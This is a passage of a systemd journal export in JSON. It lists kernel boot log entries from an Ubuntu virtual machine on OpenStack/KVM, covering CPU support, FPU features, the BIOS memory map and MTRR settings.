"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1;b=e2b08827b5804427b422c10c84f1567e;m=5580a6;t=5bd16dd19000e;x=c051adcbd24ec9d9", "__REALTIME_TIMESTAMP" : "1615280779886606", "__MONOTONIC_TIMESTAMP" : "5603494", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "MESSAGE" : "Linux version 4.15.0-60-generic (buildd@lgw01-amd64-030) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #67-Ubuntu SMP Thu Aug 22 16:55:30 UTC 2019 (Ubuntu 4.15.0-60.67-generic 4.15.18)", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2;b=e2b08827b5804427b422c10c84f1567e;m=5580ef;t=5bd16dd190056;x=6625bc488f616068", "__REALTIME_TIMESTAMP" : "1615280779886678", "__MONOTONIC_TIMESTAMP" : "5603567", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Command line: BOOT_IMAGE=/boot/vmlinuz-4.15.0-60-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3;b=e2b08827b5804427b422c10c84f1567e;m=5580fc;t=5bd16dd190063;x=b9b11c44043d6efd", "__REALTIME_TIMESTAMP" : "1615280779886691", "__MONOTONIC_TIMESTAMP" : "5603580", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "KERNEL supported cpus:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4;b=e2b08827b5804427b422c10c84f1567e;m=558105;t=5bd16dd19006c;x=73e76d9bac5bf174", "__REALTIME_TIMESTAMP" : "1615280779886700", 
"__MONOTONIC_TIMESTAMP" : "5603589", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Intel GenuineIntel" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5;b=e2b08827b5804427b422c10c84f1567e;m=55810d;t=5bd16dd190075;x=e0fc2ab01305acb9", "__REALTIME_TIMESTAMP" : "1615280779886709", "__MONOTONIC_TIMESTAMP" : "5603597", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " AMD AuthenticAMD" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6;b=e2b08827b5804427b422c10c84f1567e;m=558116;t=5bd16dd19007d;x=2b216ce1cd7e969b", "__REALTIME_TIMESTAMP" : "1615280779886717", "__MONOTONIC_TIMESTAMP" : "5603606", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Centaur CentaurHauls" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7;b=e2b08827b5804427b422c10c84f1567e;m=558123;t=5bd16dd19008b;x=753688cca998c71f", "__REALTIME_TIMESTAMP" : "1615280779886731", "__MONOTONIC_TIMESTAMP" : "5603619", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating point registers'" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8;b=e2b08827b5804427b422c10c84f1567e;m=55813c;t=5bd16dd1900a4;x=126a9f347823ed25", "__REALTIME_TIMESTAMP" : "1615280779886756", "__MONOTONIC_TIMESTAMP" : "5603644", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9;b=e2b08827b5804427b422c10c84f1567e;m=558146;t=5bd16dd1900ae;x=f3457b360b1dc2a1", "__REALTIME_TIMESTAMP" : "1615280779886766", "__MONOTONIC_TIMESTAMP" : "5603654", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a;b=e2b08827b5804427b422c10c84f1567e;m=558152;t=5bd16dd1900b9;x=5f0007f265216832", "__REALTIME_TIMESTAMP" : "1615280779886777", "__MONOTONIC_TIMESTAMP" : "5603666", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b;b=e2b08827b5804427b422c10c84f1567e;m=55815b;t=5bd16dd1900c3;x=ac0b779e15c3e2e4", "__REALTIME_TIMESTAMP" : "1615280779886787", "__MONOTONIC_TIMESTAMP" : "5603675", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", 
"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c;b=e2b08827b5804427b422c10c84f1567e;m=558178;t=5bd16dd1900df;x=83cffa4921471e01", "__REALTIME_TIMESTAMP" : "1615280779886815", "__MONOTONIC_TIMESTAMP" : "5603704", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "e820: BIOS-provided physical RAM map:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d;b=e2b08827b5804427b422c10c84f1567e;m=558181;t=5bd16dd1900e8;x=3d6809c19f32501", "__REALTIME_TIMESTAMP" : "1615280779886824", "__MONOTONIC_TIMESTAMP" : "5603713", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e;b=e2b08827b5804427b422c10c84f1567e;m=55818a;t=5bd16dd1900f1;x=86babca894ceac2f", "__REALTIME_TIMESTAMP" : "1615280779886833", "__MONOTONIC_TIMESTAMP" : "5603722", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f;b=e2b08827b5804427b422c10c84f1567e;m=558196;t=5bd16dd1900fe;x=9b0dc0acf836acae", "__REALTIME_TIMESTAMP" : "1615280779886846", "__MONOTONIC_TIMESTAMP" : "5603734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10;b=e2b08827b5804427b422c10c84f1567e;m=5581a3;t=5bd16dd19010a;x=dc8c8f4c503ce77c", "__REALTIME_TIMESTAMP" : "1615280779886858", "__MONOTONIC_TIMESTAMP" : "5603747", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x0000000000100000-0x000000007ffdbfff] usable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11;b=e2b08827b5804427b422c10c84f1567e;m=5581b5;t=5bd16dd19011c;x=d98108b0778208d0", "__REALTIME_TIMESTAMP" : "1615280779886876", "__MONOTONIC_TIMESTAMP" : "5603765", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x000000007ffdc000-0x000000007fffffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12;b=e2b08827b5804427b422c10c84f1567e;m=5581c3;t=5bd16dd19012a;x=243e15a620c43f41", "__REALTIME_TIMESTAMP" : "1615280779886890", "__MONOTONIC_TIMESTAMP" : "5603779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", 
"SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x00000000feffc000-0x00000000feffffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13;b=e2b08827b5804427b422c10c84f1567e;m=5581cc;t=5bd16dd190134;x=9df9e25b4913d3c5", "__REALTIME_TIMESTAMP" : "1615280779886900", "__MONOTONIC_TIMESTAMP" : "5603788", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14;b=e2b08827b5804427b422c10c84f1567e;m=5581d5;t=5bd16dd19013d;x=36b965c29ff40590", "__REALTIME_TIMESTAMP" : "1615280779886909", "__MONOTONIC_TIMESTAMP" : "5603797", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "NX (Execute Disable) protection: active" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15;b=e2b08827b5804427b422c10c84f1567e;m=5581de;t=5bd16dd190146;x=c6690de411e5df17", "__REALTIME_TIMESTAMP" : "1615280779886918", "__MONOTONIC_TIMESTAMP" : "5603806", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "SMBIOS 2.8 present." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16;b=e2b08827b5804427b422c10c84f1567e;m=5581e7;t=5bd16dd19014f;x=c4fdbca5419d55f3", "__REALTIME_TIMESTAMP" : "1615280779886927", "__MONOTONIC_TIMESTAMP" : "5603815", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "DMI: OpenStack Foundation OpenStack Nova, BIOS 1.10.2-1ubuntu1 04/01/2014" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17;b=e2b08827b5804427b422c10c84f1567e;m=5581f3;t=5bd16dd19015a;x=de982aa3b245a14a", "__REALTIME_TIMESTAMP" : "1615280779886938", "__MONOTONIC_TIMESTAMP" : "5603827", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Hypervisor detected: KVM" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18;b=e2b08827b5804427b422c10c84f1567e;m=5581fc;t=5bd16dd190164;x=a542e74c0abd30a6", "__REALTIME_TIMESTAMP" : "1615280779886948", "__MONOTONIC_TIMESTAMP" : "5603836", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "e820: update [mem 0x00000000-0x00000fff] usable ==> reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19;b=e2b08827b5804427b422c10c84f1567e;m=558205;t=5bd16dd19016d;x=f6828ca424fd1ccb", "__REALTIME_TIMESTAMP" : "1615280779886957", "__MONOTONIC_TIMESTAMP" : "5603845", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", 
"SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "e820: remove [mem 0x000a0000-0x000fffff] usable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a;b=e2b08827b5804427b422c10c84f1567e;m=55820f;t=5bd16dd190176;x=1ddef7fd13afc6c9", "__REALTIME_TIMESTAMP" : "1615280779886966", "__MONOTONIC_TIMESTAMP" : "5603855", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "e820: last_pfn = 0x7ffdc max_arch_pfn = 0x400000000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b;b=e2b08827b5804427b422c10c84f1567e;m=558217;t=5bd16dd19017f;x=b37967a7d5978781", "__REALTIME_TIMESTAMP" : "1615280779886975", "__MONOTONIC_TIMESTAMP" : "5603863", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "MTRR default type: write-back" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c;b=e2b08827b5804427b422c10c84f1567e;m=558220;t=5bd16dd190188;x=59ac1a4d33299f29", "__REALTIME_TIMESTAMP" : "1615280779886984", "__MONOTONIC_TIMESTAMP" : "5603872", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "MTRR fixed ranges enabled:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d;b=e2b08827b5804427b422c10c84f1567e;m=558229;t=5bd16dd190191;x=dbfd08ab63661380", "__REALTIME_TIMESTAMP" : "1615280779886993", 
"__MONOTONIC_TIMESTAMP" : "5603881", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 00000-9FFFF write-back" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e;b=e2b08827b5804427b422c10c84f1567e;m=558232;t=5bd16dd190199;x=8e640bc12038fc0", "__REALTIME_TIMESTAMP" : "1615280779887001", "__MONOTONIC_TIMESTAMP" : "5603890", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " A0000-BFFFF uncachable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f;b=e2b08827b5804427b422c10c84f1567e;m=55823b;t=5bd16dd1901a2;x=3ba105f65bb369a0", "__REALTIME_TIMESTAMP" : "1615280779887010", "__MONOTONIC_TIMESTAMP" : "5603899", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " C0000-FFFFF write-protect" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20;b=e2b08827b5804427b422c10c84f1567e;m=558244;t=5bd16dd1901ab;x=bf02c2451cebc555", "__REALTIME_TIMESTAMP" : "1615280779887019", "__MONOTONIC_TIMESTAMP" : "5603908", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "MTRR variable ranges enabled:" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21;b=e2b08827b5804427b422c10c84f1567e;m=558250;t=5bd16dd1901b8;x=3a0ef5af2fac8430", "__REALTIME_TIMESTAMP" : "1615280779887032", "__MONOTONIC_TIMESTAMP" : "5603920", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 0 base 0080000000 mask FF80000000 uncachable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22;b=e2b08827b5804427b422c10c84f1567e;m=558259;t=5bd16dd1901c1;x=3662b4af19fec2c4", "__REALTIME_TIMESTAMP" : "1615280779887041", "__MONOTONIC_TIMESTAMP" : "5603929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 1 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23;b=e2b08827b5804427b422c10c84f1567e;m=558265;t=5bd16dd1901cc;x=d9edabc73fc9138c", "__REALTIME_TIMESTAMP" : "1615280779887052", "__MONOTONIC_TIMESTAMP" : "5603941", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 2 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24;b=e2b08827b5804427b422c10c84f1567e;m=55826d;t=5bd16dd1901d5;x=a1281317ddbe980", "__REALTIME_TIMESTAMP" : "1615280779887061", "__MONOTONIC_TIMESTAMP" : "5603949", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : 
"ubuntu", "PRIORITY" : "7", "MESSAGE" : " 3 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25;b=e2b08827b5804427b422c10c84f1567e;m=558276;t=5bd16dd1901de;x=c3c4e867250818c7", "__REALTIME_TIMESTAMP" : "1615280779887070", "__MONOTONIC_TIMESTAMP" : "5603958", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 4 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26;b=e2b08827b5804427b422c10c84f1567e;m=55827f;t=5bd16dd1901e6;x=d74e81ef909ae85c", "__REALTIME_TIMESTAMP" : "1615280779887078", "__MONOTONIC_TIMESTAMP" : "5603967", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 5 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27;b=e2b08827b5804427b422c10c84f1567e;m=558288;t=5bd16dd1901ef;x=ecd4fa263890de6e", "__REALTIME_TIMESTAMP" : "1615280779887087", "__MONOTONIC_TIMESTAMP" : "5603976", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 6 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28;b=e2b08827b5804427b422c10c84f1567e;m=558291;t=5bd16dd1901f8;x=f8cc968f8f9e390b", "__REALTIME_TIMESTAMP" : "1615280779887096", "__MONOTONIC_TIMESTAMP" : "5603985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
